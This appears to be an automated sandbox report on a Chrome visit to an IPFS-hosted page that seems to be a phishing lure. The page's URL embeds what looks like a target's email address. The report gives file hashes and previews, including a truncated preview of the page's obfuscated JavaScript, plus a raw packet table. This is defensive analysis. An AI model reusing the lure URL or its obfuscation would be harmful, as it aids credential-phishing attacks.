                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, clientservices.googleapis.com, wu.azureedge.net, appleid.cdn-apple.com, clients2.google.com, ocsp.digicert.com, www.googletagmanager.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, e2885.e9.akamaiedge.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, wu-b-net.trafficmanager.net, firebasestorage.googleapis.com, appleid.cdn-apple.com.edgekey.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ajax.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, t0.gstatic.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, appleid.cdn-apple.com.akadns.net, azureedge-t-prod.trafficmanager.net, clients.l.google.com
                                                  • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.com
                                                  No simulations
                                                  No context
                                                  No context
                                                  No context
                                                  No context
                                                  No context
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (65502), with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):332276
                                                  Entropy (8bit):3.9526047025203535
                                                  Encrypted:false
                                                  SSDEEP:768:5/aFrcXrFYnk9bAxYnI4obu3V5VRpKHzgCr0cfaxY/8cXRlC/t02Lj8o0pp8tBsT:UDr0hxYkFPIk8e4S81EG/8I
                                                  MD5:F7875064EFB942BE79DBCCC509628409
                                                  SHA1:93C8DEBDB081E72C00BD542196B4C5455FCA6DF9
                                                  SHA-256:17B16AF1AB44B03DEBD90516C4414AA45D7BABB406394CF60217EB17A82D4321
                                                  SHA-512:08F135E0FAD8E89304BB9EF7306C69CA9D9950528FABE8995A964142D71898E2E46E801349913B17D52ADE7B1E4C1BCDB02CDA0A4EA5B436ADFF90E66AA808AA
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/
                                                  Preview:<script language="javascript">....function _0x8511(_0x12c622,_0x33ea01){var _0x4e71f6=_0x3869();return _0x8511=function(_0x18bf18,_0x32a4de){_0x18bf18=_0x18bf18-(-0x1fe5+0x1*0x1335+-0x12e*-0xc);var _0x52db82=_0x4e71f6[_0x18bf18];return _0x52db82;},_0x8511(_0x12c622,_0x33ea01);}var _0x2b64fe=_0x8511,_0x3bcaca=_0x8511,_0x2f8c40=_0x8511,_0x1d49e4=_0x8511,_0x64c956=_0x8511;(function(_0x5bd66c,_0x43aae1){var _0x3e96b7=_0x8511,_0x4171e4=_0x8511,_0x19d2bb=_0x8511,_0x5b7049=_0x8511,_0x23c2f1=_0x8511,_0x1b3c3c=_0x5bd66c();while(!![]){try{var _0x31fb60=parseInt(_0x3e96b7('\x30\x78\x35\x37\x62'))/(0x1843+-0xc1+-0x1781)+-parseInt(_0x4171e4('\x30\x78\x35\x31\x30'))/(0x695*0x2+0x75c+-0x1484)*(-parseInt(_0x19d2bb('\x30\x78\x35\x39\x38'))/(-0x1ef6+-0x14aa+0x33a3))+-parseInt(_0x19d2bb('\x30\x78\x35\x32\x38'))/(0x23c8+0x1fc8+-0x438c*0x1)+parseInt(_0x23c2f1('\x30\x78\x36\x33\x37'))/(0x1d*-0x2b+-0x9f7+0x1*0xedb)+parseInt(_0x3e96b7('\x30\x78\x32\x63\x38'))/(-0xbf6+-0x9*0x239+0x1ffd)+parseInt(_0x3e96b7('\x3
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65326)
                                                  Category:downloaded
                                                  Size (bytes):160302
                                                  Entropy (8bit):5.078105585474276
                                                  Encrypted:false
                                                  SSDEEP:1536:V47CIJ0T2r+ryEIA1pDEBi8yNcuSEcA1/uypq3SYiLENM6HN26b:S7VSGGq3SYiLENM6HN26b
                                                  MD5:816AF0EDDD3B4822C2756227C7E7B7EE
                                                  SHA1:C470239D4C7DB36D56DC3A74A080C62218C6EDC4
                                                  SHA-256:5B0FBE5B7AD705F6A937C4998AD02F73D8F0D976FE231B74AEF0EC996990C93A
                                                  SHA-512:32844D968C5B4AD05C0FCCF733FD819A74FEAE0E08B0CC4F917686876CC3E8B18D34513CD16DE89EC02145C30032B4A8C962FDC43EC4AEDD267A7EEF47C2D466
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css
                                                  Preview:/*!. * Bootstrap v4.5.2 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors. * Copyright 2011-2020 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:bo
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 16 x 16, 8-bit colormap, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):191
                                                  Entropy (8bit):5.761467573261169
                                                  Encrypted:false
                                                  SSDEEP:3:yionv//thPl9vtt/JnDzDPkGxqSGqFFFsll2zDDKQ8xP/5oz+HsFrTGOJO/jp:6v/lhPfpzwGxqCFFFslQ2Qs5ocKuzbp
                                                  MD5:4EE47E5810EBF1C09FFC13CBB8BC9526
                                                  SHA1:EBD7E71B287F721615AE1509C85380E9F658729E
                                                  SHA-256:03098B2E2EC75B33D6E58B511547335BF16D2D454926C583799525E49FB0B7C3
                                                  SHA-512:1EF12BEDCB1F209A867064064444B6D96EDBF9502BC4B9C6D8D79952509E8D26A53E57267CB2228E575DFEC584826C6899EA0F92C8F11999A9AAE9C4B8F87578
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:"https://t0.gstatic.com/faviconV2?client=SOCIAL&type=FAVICON&fallback_opts=TYPE,SIZE,URL&url=http://virtualintelligencebriefing.com&size=16"
                                                  Preview:.PNG........IHDR.............(-.S...$PLTEGpL.O..O..O..O..O..O..O..O..O..O..O...AR....tRNS.i..!I...K........?IDAT..c`...L`...3rC.3-..a....JX........\ e(.. .F$......LL......s.w..,.....IEND.B`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (2345)
                                                  Category:dropped
                                                  Size (bytes):215742
                                                  Entropy (8bit):5.53507424107127
                                                  Encrypted:false
                                                  SSDEEP:3072:tZwizDGLETutRA0C5yptcY0/H8+ZGEQDmuD0C8rT/t5t/rR:1GLgutkY4Wd0C8rT/tLN
                                                  MD5:E882A37B3CA74CC2BA50DD5C1974B682
                                                  SHA1:8DA819D582339D0C683295F74E4CA48C10E586BC
                                                  SHA-256:4C68E592B457DA0CF3FAD67B2B29D5F8B1AED2F2F563ECD53A27CF2BEADCE5F2
                                                  SHA-512:8C6D2B95F5CCAB6BC67117D2659EE63D23D4ADB0D201E221A97EBAD00A6DA06ED700F633B955EC147A9A2F046E4A1668C99656606481B6426FF2363A12ACC21E
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"undefined"}],. "tags":[{"function":"__rep","vtp_containerId":"UA-48347893-1","vtp_remoteConfig":["map"],"tag_id":1},{"function":"__zone","vtp_childContainers":["list",["map","publicId","G-VDRZSEZ5M5"]],"vtp_enableConfiguration":false,"tag_id":3}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0,1]]].},."runtime":[ [50,"__c",[46,"a"],[36,[17,[15,"a"],"value"]]]. ,[50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. .].,"entities":{."__c":{"2":true,"4":true}.,."__e":{"2":true,"4":true}...}.,"blob":{"1":"1"}.,"permissions":{."__c":{}.,."__e":{"read_event_data":{"eventDataAccess":"specific","keyPatterns":["event"]}}...}....,"security_groups":{."google":[."__c".,."__e"..]...}....};.....var h,aa=function(a){var b=0;r
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (2345)
                                                  Category:downloaded
                                                  Size (bytes):215742
                                                  Entropy (8bit):5.53507424107127
                                                  Encrypted:false
                                                  SSDEEP:3072:tZwizDGLETutRA0C5yptcY0/H8+ZGEQDmuD0C8rT/t5t/rR:1GLgutkY4Wd0C8rT/tLN
                                                  MD5:E882A37B3CA74CC2BA50DD5C1974B682
                                                  SHA1:8DA819D582339D0C683295F74E4CA48C10E586BC
                                                  SHA-256:4C68E592B457DA0CF3FAD67B2B29D5F8B1AED2F2F563ECD53A27CF2BEADCE5F2
                                                  SHA-512:8C6D2B95F5CCAB6BC67117D2659EE63D23D4ADB0D201E221A97EBAD00A6DA06ED700F633B955EC147A9A2F046E4A1668C99656606481B6426FF2363A12ACC21E
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://www.googletagmanager.com/gtag/js?id=UA-48347893-1
                                                  Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"undefined"}],. "tags":[{"function":"__rep","vtp_containerId":"UA-48347893-1","vtp_remoteConfig":["map"],"tag_id":1},{"function":"__zone","vtp_childContainers":["list",["map","publicId","G-VDRZSEZ5M5"]],"vtp_enableConfiguration":false,"tag_id":3}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0,1]]].},."runtime":[ [50,"__c",[46,"a"],[36,[17,[15,"a"],"value"]]]. ,[50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. .].,"entities":{."__c":{"2":true,"4":true}.,."__e":{"2":true,"4":true}...}.,"blob":{"1":"1"}.,"permissions":{."__c":{}.,."__e":{"read_event_data":{"eventDataAccess":"specific","keyPatterns":["event"]}}...}....,"security_groups":{."google":[."__c".,."__e"..]...}....};.....var h,aa=function(a){var b=0;r
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (39767)
                                                  Category:downloaded
                                                  Size (bytes):43171
                                                  Entropy (8bit):6.072760892799744
                                                  Encrypted:false
                                                  SSDEEP:768:7J5Ab8SnVCFqwivkAuLabUnQt2weVCFqwivkRRRum6AlVFyICfHXs:dyASniqILeUQmiq/m9W8
                                                  MD5:5016E169748A6E203FDF156B9AB6DA33
                                                  SHA1:E882467086E870ED3D166982CF27D8B855078CE0
                                                  SHA-256:8356948D6F3BEF342FF37A4DECA7F6B64B58CA0B90CA128C1929C1BB76CC7A54
                                                  SHA-512:CD47019302E7B9CC90EFD0FFD5CA921C139013DB9B3F44CAD87D1AE8536BA4F827EF67C01956A7569FCD73F23DF3746A0AD2E178D122D110D9584AE8BADBE7F9
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://appleid.cdn-apple.com/appleauth/static/jsapi/appleid/1/en_US/appleid.auth.js
                                                  Preview:/**. * Copyright (c) 2023 Apple Inc. All rights reserved.. * . * # Sign In with Apple License. * . * **IMPORTANT:** This Sign In with Apple software is supplied to you by Apple Inc. ("Apple") in consideration of your agreement to the following terms, and your use, reproduction, or installation of this Apple software constitutes acceptance of these terms. If you do not agree with these terms, please do not use, reproduce or install this Apple software.. * . * This software is licensed to you only for use with Sign In with Apple that you are authorized or legally permitted to embed or display on your website.. *. * The Sign In with Apple software is only licensed and intended for the purposes set forth above and may not be used for other purposes or in other contexts without Apple's prior written permission. For the sake of clarity, you may not and agree not to or enable others to, modify or create derivative works of the Sign In with Apple software.. *. * You may only use the Sign In wi
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):28
                                                  Entropy (8bit):4.378783493486175
                                                  Encrypted:false
                                                  SSDEEP:3:qinPt:qyPt
                                                  MD5:4C42AB4890733A2B01B1B3269C4855E7
                                                  SHA1:5B68BFE664DCBC629042EA45C23954EEF1A9F698
                                                  SHA-256:F69E8FC1414A82F108CFA0725E5211AF1865A9CEA342A5F01E6B2B5ABE47E010
                                                  SHA-512:0631C6EFD555699CB2273107FE5AF565FEC2234344E2D412C23E4EE43C6D721CB2B058764622E44FD544D840FF64D7C866565E280127C701CAAB0A48C35D4F5C
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwnU5EcFJdMaHBIFDYOoWz0SBQ3OQUx6?alt=proto
                                                  Preview:ChIKBw2DqFs9GgAKBw3OQUx6GgA=
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):492
                                                  Entropy (8bit):7.443140866786406
                                                  Encrypted:false
                                                  SSDEEP:12:6v/7w9xBoc7dfbmXwR54uPABdsBCRGE03H76f79ysL5w:t9/1dfbV5pIssN03H7kpyW5w
                                                  MD5:3CA64F83FDCF25135D87E08AF65E68C9
                                                  SHA1:B82D0979D555BD137B33C15021129E06CBEEA59A
                                                  SHA-256:2E30FF33270FD8687B0EB4D12652BFD967F23975F158BF8DA93BECE2BA4AB947
                                                  SHA-512:7675A8C4E6146E62DDA019340EF95E477AA3D14364B5A773114EA1110C38233F5D8D9B08F6C83BF7664B33695AAC7254B25D727A15EA6A9DED2EC9D1EA07DC0E
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.PNG........IHDR................a....IDATx.b...?E........;C..i[PI....>......(.1.c..b...d..m.m';]...W{...S......+..'.}..X........~...N..1...E...S1E..O.PX\..C...o]<.........[.T..d.Rm..u.n.....<........:...#.P..c.*2....g.....!...>v.:...#...J..d.xx."..x._=....k...!.!!;@.....+.{`..+.....gk.....@N..-@.X.q......K...'..@@)...........&.w.......%..<&.N.._x.G`c..F%L.eC.80H`L...#Z..F....e.......L.H...L.&a..5.0..V4N..m..........$.......(..b{....8a.L.a.BM....0.....IEND.B`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65447)
                                                  Category:dropped
                                                  Size (bytes):89501
                                                  Entropy (8bit):5.289893677458563
                                                  Encrypted:false
                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):492
                                                  Entropy (8bit):7.443140866786406
                                                  Encrypted:false
                                                  SSDEEP:12:6v/7w9xBoc7dfbmXwR54uPABdsBCRGE03H76f79ysL5w:t9/1dfbV5pIssN03H7kpyW5w
                                                  MD5:3CA64F83FDCF25135D87E08AF65E68C9
                                                  SHA1:B82D0979D555BD137B33C15021129E06CBEEA59A
                                                  SHA-256:2E30FF33270FD8687B0EB4D12652BFD967F23975F158BF8DA93BECE2BA4AB947
                                                  SHA-512:7675A8C4E6146E62DDA019340EF95E477AA3D14364B5A773114EA1110C38233F5D8D9B08F6C83BF7664B33695AAC7254B25D727A15EA6A9DED2EC9D1EA07DC0E
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://firebasestorage.googleapis.com/v0/b/portal-aa363.appspot.com/o/favicons.png?alt=media&token=805fb0ef-a2d9-4a7f-85e6-d68384e166e3
                                                  Preview:.PNG........IHDR................a....IDATx.b...?E........;C..i[PI....>......(.1.c..b...d..m.m';]...W{...S......+..'.}..X........~...N..1...E...S1E..O.PX\..C...o]<.........[.T..d.Rm..u.n.....<........:...#.P..c.*2....g.....!...>v.:...#...J..d.xx."..x._=....k...!.!!;@.....+.{`..+.....gk.....@N..-@.X.q......K...'..@@)...........&.w.......%..<&.N.._x.G`c..F%L.eC.80H`L...#Z..F....e.......L.H...L.&a..5.0..V4N..m..........$.......(..b{....8a.L.a.BM....0.....IEND.B`.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (39767)
                                                  Category:dropped
                                                  Size (bytes):43171
                                                  Entropy (8bit):6.072760892799744
                                                  Encrypted:false
                                                  SSDEEP:768:7J5Ab8SnVCFqwivkAuLabUnQt2weVCFqwivkRRRum6AlVFyICfHXs:dyASniqILeUQmiq/m9W8
                                                  MD5:5016E169748A6E203FDF156B9AB6DA33
                                                  SHA1:E882467086E870ED3D166982CF27D8B855078CE0
                                                  SHA-256:8356948D6F3BEF342FF37A4DECA7F6B64B58CA0B90CA128C1929C1BB76CC7A54
                                                  SHA-512:CD47019302E7B9CC90EFD0FFD5CA921C139013DB9B3F44CAD87D1AE8536BA4F827EF67C01956A7569FCD73F23DF3746A0AD2E178D122D110D9584AE8BADBE7F9
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:/**. * Copyright (c) 2023 Apple Inc. All rights reserved.. * . * # Sign In with Apple License. * . * **IMPORTANT:** This Sign In with Apple software is supplied to you by Apple Inc. ("Apple") in consideration of your agreement to the following terms, and your use, reproduction, or installation of this Apple software constitutes acceptance of these terms. If you do not agree with these terms, please do not use, reproduce or install this Apple software.. * . * This software is licensed to you only for use with Sign In with Apple that you are authorized or legally permitted to embed or display on your website.. *. * The Sign In with Apple software is only licensed and intended for the purposes set forth above and may not be used for other purposes or in other contexts without Apple's prior written permission. For the sake of clarity, you may not and agree not to or enable others to, modify or create derivative works of the Sign In with Apple software.. *. * You may only use the Sign In wi
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65447)
                                                  Category:downloaded
                                                  Size (bytes):89501
                                                  Entropy (8bit):5.289893677458563
                                                  Encrypted:false
                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js
                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text
                                                  Category:downloaded
                                                  Size (bytes):188
                                                  Entropy (8bit):4.861254650285724
                                                  Encrypted:false
                                                  SSDEEP:3:fkreWdsRHq2pj1AXX1Bf2GmxKzLKD7CFwhGM/QB2j1AXX1Bf2Gmxv:fIdsRntcjfix0+a10cjfixv
                                                  MD5:F181AB7E53B5577952F40E7184AE6CE4
                                                  SHA1:EEEC479779184A083ADA69C48F5D10CC2C6B27DD
                                                  SHA-256:2B1FE2DF6ACCA1E354735A7D114B1EE1F5E1708CB95917813EF43AF7D2A531B4
                                                  SHA-512:991417483270A6036A3112A5776B56250775DFC2C109C16B7D9A951116C53892EDC84B48FCB21FD65C15127BD8497F36AF3552A4F3967DCB06F9713FFAD98DE5
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/img/bg-image.jpg
                                                  Preview:failed to resolve /ipfs/bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma/img/bg-image.jpg: no link named "img" under bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 16 x 16, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):191
                                                  Entropy (8bit):5.761467573261169
                                                  Encrypted:false
                                                  SSDEEP:3:yionv//thPl9vtt/JnDzDPkGxqSGqFFFsll2zDDKQ8xP/5oz+HsFrTGOJO/jp:6v/lhPfpzwGxqCFFFslQ2Qs5ocKuzbp
                                                  MD5:4EE47E5810EBF1C09FFC13CBB8BC9526
                                                  SHA1:EBD7E71B287F721615AE1509C85380E9F658729E
                                                  SHA-256:03098B2E2EC75B33D6E58B511547335BF16D2D454926C583799525E49FB0B7C3
                                                  SHA-512:1EF12BEDCB1F209A867064064444B6D96EDBF9502BC4B9C6D8D79952509E8D26A53E57267CB2228E575DFEC584826C6899EA0F92C8F11999A9AAE9C4B8F87578
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.PNG........IHDR.............(-.S...$PLTEGpL.O..O..O..O..O..O..O..O..O..O..O...AR....tRNS.i..!I...K........?IDAT..c`...L`...3rC.3-..a....JX........\ e(.. .F$......LL......s.w..,.....IEND.B`.
                                                  No static file info
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 31, 2024 20:49:36.678148985 CET49675443192.168.2.4173.222.162.32
                                                  Oct 31, 2024 20:49:39.427745104 CET49735443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:39.427764893 CET44349735209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:39.427953005 CET49736443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:39.427968025 CET49735443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:39.427990913 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:39.428205013 CET49735443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:39.428219080 CET44349735209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:39.428245068 CET49736443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:39.428468943 CET49736443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:39.428487062 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.047940016 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.050915956 CET49736443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:40.050942898 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.052095890 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.052167892 CET49736443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:40.056031942 CET49736443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:40.056103945 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.056343079 CET49736443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:40.056354046 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.065078020 CET44349735209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.066778898 CET49735443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:40.066804886 CET44349735209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.067892075 CET44349735209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.067977905 CET49735443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:40.068371058 CET49735443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:40.068434954 CET44349735209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.115065098 CET49735443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:40.115114927 CET44349735209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.163000107 CET49736443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:40.163809061 CET49735443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:40.213767052 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.213860989 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.213888884 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.213923931 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.214128971 CET49736443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:40.214128971 CET49736443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:40.214157104 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.218067884 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.218111038 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.218173027 CET49736443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:40.218192101 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.218646049 CET49736443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:40.220192909 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.220254898 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.220324993 CET49736443192.168.2.4209.94.90.3
                                                  Oct 31, 2024 20:49:40.220345020 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.330955982 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.332473040 CET44349736209.94.90.3192.168.2.4
                                                  Oct 31, 2024 20:49:40.332511902 CET44349736209.94.90.3192.168.2.4
